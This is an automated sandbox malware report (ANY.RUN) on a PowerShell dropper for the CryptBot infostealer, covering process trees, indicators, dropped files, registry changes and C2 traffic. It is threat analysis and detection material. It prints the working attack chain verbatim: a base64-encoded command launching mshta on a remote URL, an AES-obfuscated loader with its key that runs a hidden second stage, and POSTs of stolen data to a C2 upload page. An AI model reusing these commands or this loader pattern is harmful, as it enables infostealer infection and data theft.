File name: | verifyhuman476.b-cdn.net.ps1 |
Full analysis: | https://app.any.run/tasks/3585f0a7-2500-47c5-9993-50b2c6f68c61 |
Verdict: | Malicious activity |
Threats: | CryptBot is an advanced Windows-targeting infostealer delivered via pirate sites with "cracked" software. It has been first observed in the wild in 2019. Malware Trends Tracker>>> |
Analysis date: | August 08, 2024, 18:36:24 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | stealer cryptbot |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 9433ED9D985D6F93E0A168C417B7F01C |
SHA1: | 16F4FB0839CFB4D008537D87906AEE0621646C27 |
SHA256: | |
SSDEEP: | 3:VSJJLNyAmarBanfknMVpvF7HMV20RtkpfhAi11H6Bto2kO7Heh:snyuW5VpvF7HMEvpfhJDH6ByDO7Hs |
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
MALICIOUS
Changes powershell execution policy (Unrestricted)
- mshta.exe (PID: 7096)
Uses AES cipher (POWERSHELL)
- powershell.exe (PID: 6164)
Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)
- powershell.exe (PID: 6164)
Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)
- powershell.exe (PID: 6164)
Run PowerShell with an invisible window
- powershell.exe (PID: 6164)
Bypass execution policy to execute commands
- powershell.exe (PID: 6400)
Scans artifacts that could help determine the target
- mshta.exe (PID: 7096)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 6164)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 6164)
Connects to the CnC server
- svchost.exe (PID: 2256)
- ShowbizFender.pif (PID: 7108)
CRYPTBOT has been detected (SURICATA)
- svchost.exe (PID: 2256)
- ShowbizFender.pif (PID: 7108)
Actions looks like stealing of personal data
- ShowbizFender.pif (PID: 7108)
SUSPICIOUS
Starts POWERSHELL.EXE for commands execution
- powershell.exe (PID: 6400)
- mshta.exe (PID: 7096)
Application launched itself
- powershell.exe (PID: 6400)
Process drops legitimate windows executable
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
Drops the executable file immediately after the start
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
Probably obfuscated PowerShell command line is found
- mshta.exe (PID: 7096)
BASE64 encoded PowerShell command has been detected
- powershell.exe (PID: 6400)
The process bypasses the loading of PowerShell profile settings
- mshta.exe (PID: 7096)
Cryptography encrypted command line is found
- powershell.exe (PID: 6164)
Base64-obfuscated command line is found
- powershell.exe (PID: 6400)
Executable content was dropped or overwritten
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 6164)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 6164)
Gets or sets the security protocol (POWERSHELL)
- powershell.exe (PID: 6164)
Gets file extension (POWERSHELL)
- powershell.exe (PID: 6164)
Starts application with an unusual extension
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
Drops a file with a rarely used extension (PIF)
- more.com (PID: 1360)
Searches for installed software
- ShowbizFender.pif (PID: 7108)
INFO
Checks proxy server information
- mshta.exe (PID: 7096)
- powershell.exe (PID: 6164)
Reads Internet Explorer settings
- mshta.exe (PID: 7096)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6164)
Disables trace logs
- powershell.exe (PID: 6164)
Checks whether the specified file exists (POWERSHELL)
- powershell.exe (PID: 6164)
Checks if a key exists in the options dictionary (POWERSHELL)
- powershell.exe (PID: 6164)
Checks supported languages
- Setup.exe (PID: 6444)
- more.com (PID: 1360)
- StrCmp.exe (PID: 6280)
- ShowbizFender.pif (PID: 7108)
Creates files or folders in the user directory
- Setup.exe (PID: 6444)
Reads the computer name
- Setup.exe (PID: 6444)
- StrCmp.exe (PID: 6280)
- more.com (PID: 1360)
- ShowbizFender.pif (PID: 7108)
The executable file from the user directory is run by the Powershell process
- Setup.exe (PID: 6444)
Create files in a temporary directory
- more.com (PID: 1360)
- Setup.exe (PID: 6444)
Reads the machine GUID from the registry
- ShowbizFender.pif (PID: 7108)
Reads CPU info
- ShowbizFender.pif (PID: 7108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the
full reportNo Malware configuration.
No data.
Total processes
141
Monitored processes
13
Malicious processes
8
Suspicious processes
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6400 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\verifyhuman476.b-cdn.net.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6408 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6808 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAG0AaQBjAHIAbwBzAG8AZgB0AGMAYQBtAHAALQB2ADEALgBiAC0AYwBkAG4ALgBuAGUAdAAvAG0AaQBjAHIAbwAtAHYAMQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7096 | "C:\WINDOWS\system32\mshta.exe" https://microsoftcamp-v1.b-cdn.net/micro-v1 | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: Version: 11.00.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6164 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function RbIcrhkL($BaAb){return -split ($BaAb -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$VKDfBkU = RbIcrhkL('85A404998110A9B127996F55BC4B1907DC089B83BB9B1DAC52D8CBBC2ED3F6D11509B3B31537DC46634623F14FB0F67752928B758F24315559E415CA90EB186270949D05D91CAEA5F312F1BE0260286495DEDA82CE6665A23F7492FCFEAA108B5755AFF0B19A55BA09958B07294C43B2C224542BD5E2E54C4C0003BE10AE276CF90A33C14F831D7BCFC167EFD1798287ADE0CF5E405D525FD0C9943385E6EA894A1EBA87F018AEEEBF26E92F9E0B13891CA85D6739844BD64D5C1A3336F4F5FA2A25C1462B312B536DB9322BC90F6759C6B14E1F0775110AB1DE2D068A6EC4BB97BD4A4E5BEF83649C24A3F25C7FD3E8467A1FB775B8D4E935D129CC8C8CAA3F36E2196058B335F010D3CCC9A4DB0C6D0B616D299D2346BDE8CD750D6E11AA2964429F3D8590AD2F196D827D1D95F5354C592F318A9D7E620B916B624C55DC35D29869F40BC2113C8D752065EDD25013ACE24DE01A2F02DC8B2F25F1414669C61A57A575A70EC787731B9D96A058C56F3AD5A630CEFF58D454E31788D32A853BAD17157EC26B3F74C939B4D262913CB58E725FEB8FA036499ED040CC5FD5C935D0B0E29A92C55D05B4442E225F8FFDC6174442607F1FD54D0E225308A362A6DBE2121DD5EA1924DDAD760820DE66CEBC7DE10D61E0566887CA11184D47D56866685EB9418B6F52AD9D59BBDB9BE243369EBA2B0336B60F21632B01DED431C90B803CB0E0273F7FB8D4F4ED8771BB221F65EF6FE5180E541041E3B1672DA9F2B9485D7C80CDCB152C82D0A5819D860F702FB54B4609EC1ECC1DC12612594BE9079A3876F7A768078BB0F90F1C4CFB44B4794982F45A8B298E4F2BB763757EC5477EAB04067FC2F6E68805CC8353324FA9A76EEF1A5B2F360E15A96825604519C6F1D70FAA5BF351D915CB4BD709093FC9B3BC7576CE48312D98ABABB77FBC59ADE7EA06B47091FA1D46102F809628D8D44C28D9CBD489C78975ABB65E8B88D2AFB36B56CEA87A7F265C3BF16C73A868E328B40EC7E5E29EC6469CB959F7DA0AC45657FC80F52B9AF786494CCBE36EB8F744B30B5471C47D7D0F37F8A17DF3F0FC4486DFF44BFDE2DC14A3B1A49C4D59DD6D1EAA251B608A610232D5B0A99B87D3E4E0293E34FA0CC028A1B67D629AEDF0ECA62AF87D1086B5F8BB58FD14097190F4DCE5B0C34B5BF29BF3DC2B88EA1996768B30462F610035533AFC214CFE48E599893A51753E1D8E915BD2E417AD91CD12CE84FAF73116150334B9E097D88F1CA12AD7857F2143F67B0776BAEE2C0DB3B995DC4B9FB882256A1539FBBA816FA8EA9A3BB2A6F85523D55F612F19758494E071FB5923D4AEE6B09A355A23E9192ECC93989B551E9F7C64EEB243F8003DE47749DC247F036D7A5C9D0F20A6199641257CA44FABDBD9F74FDF0F03BBC3D5A617FB7183C6CB05B9812F01C377D66DEEB4F334EA2AA43739E46E960A403049F49EEEE3CA935CC0940CE4BE8F94CEEF9D3FD9580CE04FCC70CA70E4B2111E831CE49DD767220517672F417CE9A0B099D05B5382DA0C378CD4DC6C5583C31D0EC457C725C6B41F6DB412638D8EFBAC82E9ABD4A197865AA85D5C06E62FE8E4DFBEDD29CD1A352EBD91E73BF0D271E986BA56EF3DA36B572CA061414FBE30F2818936E76098B9DCFB07040A7678ED4BE468E093B2A363894FF70A37E45C07A5FE43D756035936BAAD9413F922CFF4C878188C759B3243A2268E0ED805788B83D813D6DD442D4FDEB4783398015FBDE2A555A5E2BCEF3D77FD45D058C4A8F611D4D93D572972660F757468E1E29B2F3201C84A49C1A12D1E57E03017A98124271CD2F3CA476DDC0383E8457642A1966A098930A333F10FAA6265689D61B9C081F132D285A9AB854A93674CB956DBBD5063CF01CD0B9690D9946480AA4A300E003015BAFCE8C61A68D4FE21C75A161CBB044BDA8C9595DECDC6B5F9BD186E015F4460CFAF0F2658D7EF02CA12E44C98E592D577802B14784B82DA8F8EBE3D103BB4DE3B4845FA150520926820887A26598EA7');$vkWTG = [System.Security.Cryptography.Aes]::Create();$vkWTG.Key = RbIcrhkL('6B644D67514D625170774950714F5359');$vkWTG.IV = New-Object byte[] 16;$FDxCnWus = $vkWTG.CreateDecryptor();$QHPEsJoUj = $FDxCnWus.TransformFinalBlock($VKDfBkU, 0, $VKDfBkU.Length);$rfPIxZhDh = [System.Text.Encoding]::Utf8.GetString($QHPEsJoUj);$FDxCnWus.Dispose();& $rfPIxZhDh.Substring(0,3) $rfPIxZhDh.Substring(3) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
460 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6476 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6444 | "C:\Users\admin\AppData\Local\Temp\Setup.exe" | C:\Users\admin\AppData\Local\Temp\Setup.exe | powershell.exe | ||||||||||||
User: admin Company: Florian Heidenreich Integrity Level: MEDIUM Description: Mp3tag - the universal Tag editor Exit code: 1 Version: 3.26.0.0 Modules
| |||||||||||||||
6280 | C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe | C:\Users\admin\AppData\Roaming\lv_op\SPSTDKDRMQDIWOTNDVPR\StrCmp.exe | — | Setup.exe | |||||||||||
User: admin Company: aaa Integrity Level: MEDIUM Version: 1.00 Modules
| |||||||||||||||
1360 | C:\WINDOWS\SysWOW64\more.com | C:\Windows\SysWOW64\more.com | Setup.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: More Utility Exit code: Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
Total events
24506
Read events
24473
Write events
33
Delete events
Modification events
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: | |||
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (7096)mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (6164)powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: | |||
(PID) Process: | (6164)powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableAutoFileTracing |
Value: | |||
(PID) Process: | (6164)powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: |
Executable files
14
Suspicious files
16
Text files
6
Unknown types
Dropped files
PID | Process | Filename | Type | |
---|---|---|---|---|
7096 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D | binary | |
MD5:51883DF11BA0F75D2AAD9E88EBD057DC | SHA256:1CC443E507D740FEDC646DCA7116EEAD8084ED9B7C70ABBB34281DD1E7DBBA10 | |||
7096 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\AH8CR9J5\micro-v1[1] | executable | |
MD5:DE219CB5F5073BE86D74F4BEE29D9E79 | SHA256:0581756A656ACE2E7D164B1F66846E9D079755BD7A5CEAD72E73B53AB534531B | |||
6400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrid0nuv.un3.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jmqnz03m.03m.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vtasglp0.4rb.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6808 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qiw3vsdx.vos.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6808 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_05pqx1ea.0uz.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\K1.zip | compressed | |
MD5:F0E4E16FEB8B7B8E95D81A7F5807164B | SHA256:AD12C4695218510096F7B75E699A106F877D378B66DD11F86783AC2C40B432C8 | |||
6164 | powershell.exe | C:\Users\admin\AppData\Local\Temp\caramel.eps | binary | |
MD5:E94BB41E97E1D8E1EAA638191A74490A | SHA256:F59A54633E14187EEB907F91C747D0E8B6FB5A970B9CDDED15800B487F20239A | |||
6400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_b2y0hfgw.k42.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
Download PCAP, analyze network streams, HTTP content and a lot more at the
full reportHTTP(S) requests
10
TCP/UDP connections
49
DNS requests
24
Threats
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
7096 | mshta.exe | GET | 200 | 172.64.149.23:80 | http://ocsp.sectigo.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRDC9IOTxN6GmyRjyTl2n4yTUczyAQUjYxexFStiuF36Zv5mwXhuAGNYeECEQCb80pEPlZ04x2fAu4YLy1O | unknown | — | — | unknown |
6572 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | unknown |
6600 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | unknown |
7096 | mshta.exe | GET | 200 | 104.18.38.233:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEH1bUSa0droR23QWC7xTDac%3D | unknown | — | — | unknown |
7096 | mshta.exe | GET | 200 | 104.18.38.233:80 | http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D | unknown | — | — | unknown |
1124 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
5336 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | unknown |
7108 | ShowbizFender.pif | POST | 200 | 185.173.38.84:80 | http://cveight8ht.top/v1/upload.php | unknown | — | — | unknown |
7108 | ShowbizFender.pif | POST | 200 | 185.173.38.84:80 | http://cveight8ht.top/v1/upload.php | unknown | — | — | unknown |
7108 | ShowbizFender.pif | POST | 200 | 185.173.38.84:80 | http://cveight8ht.top/v1/upload.php | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the
full reportConnections
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1860 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3888 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
2120 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
3260 | svchost.exe | 40.113.103.199:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1124 | svchost.exe | 40.126.32.140:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
5336 | SearchApp.exe | 184.86.251.23:443 | www.bing.com | Akamai International B.V. | DE | unknown |
1124 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
5336 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
DNS requests
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |
login.live.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
microsoftcamp-v1.b-cdn.net |
| unknown |
ocsp.comodoca.com |
| whitelisted |
th.bing.com |
| whitelisted |
ocsp.usertrust.com |
| whitelisted |
Threats
PID | Process | Class | Message |
---|---|---|---|
2256 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
2256 | svchost.exe | A Network Trojan was detected | ET MALWARE Cryptbot CnC DGA Domain (eight8) |
7108 | ShowbizFender.pif | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
7108 | ShowbizFender.pif | A Network Trojan was detected | ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 |
7108 | ShowbizFender.pif | A Network Trojan was detected | ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 |
7108 | ShowbizFender.pif | A Network Trojan was detected | ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 |
No debug info